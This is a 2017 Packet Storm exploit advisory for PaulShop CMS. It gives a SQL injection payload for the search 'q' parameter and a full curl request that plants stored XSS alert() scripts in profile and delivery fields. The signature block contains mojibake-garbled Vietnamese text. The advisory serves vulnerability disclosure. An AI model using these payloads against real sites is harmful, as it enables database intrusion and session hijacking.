PaulShop Cross Site Scripting / SQL Injection

🗓️ 24 Jul 2017 00:00:00Reported by BTIS TeamType

packetstorm🔗 packetstormsecurity.com👁 49 Views

PaulShop CMS SQL Injection and XS

`# Exploit Title: PaulShop CMS - Sql Injection and stored XSS  
# Date: 07/23/2017  
# Exploit Author: BTIS Team (http://www.btis.vn)  
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]  
# Version: 03/27/2017  
# Tested on: Apache/2.4.7 (Ubuntu)  
# Contact: [email protected]  
# Can not contact vendor  
  
  
  
1. Description  
  
- SQL Injection on Search page with "q" parameter (GET)  
  
- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode]  
  
2. Examples  
  
  
  
- SQL injection:   
  
  
  
# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE]  
  
# Payload: - True condition: europe' and 1=1)-- -  
  
- False condition: europe' and 1=0)-- -  
  
  
  
- Stored XSS:   
  
  
  
# Payload: %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E  
  
# curl -X POST \  
  
'http://localhost/shop/en/account?save=1' \  
  
-H 'cookie: cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \  
  
-b 'cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \  
  
-d 'email=btis%40mailinator.com&password=123456xyz&firstname=BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=VN%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&address=address%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&city=city%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&state=HCM%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&zipcode=700000%22%3E%3Cscript%3Ealert%2812%29%3C%2Fscript%3E&country=VN&phone=%22%3E%3Cscript%3Ealert%2810%29%3C%2Fscript%3E&fax=fax%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&delivery%5Baddress%5D=adr2%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&delivery%5Bcity%5D=city2%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&delivery%5Bstate%5D=MNB%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&delivery%5Bzipcode%5D=800000%22%3E%3Cscript%3Ealert%2811%29%3C%2Fscript%3E&delivery%5Bcountry%5D=AD&save=Save'  
  
  
  
Quan Minh TAC/m / TrAEdega>>ng phA2ng ka>>1 thuaot  
<mailto:[email protected]> [email protected] / 01284 211 290  
  
CANG TY CANG NGHa>> BaoC/O TAN   
028 3810 6288 a 028 38106289  
5A TraoSSn VAn DAEdeg, phAEdega>>ng 13, quaon TAC/n BA!nh, Tp.Ha>> ChA Minh  
<http://www.btis.vn> www.btis.vn  
`

24 Jul 2017 00:00Current

0.6Low risk

Vulners AI Score0.6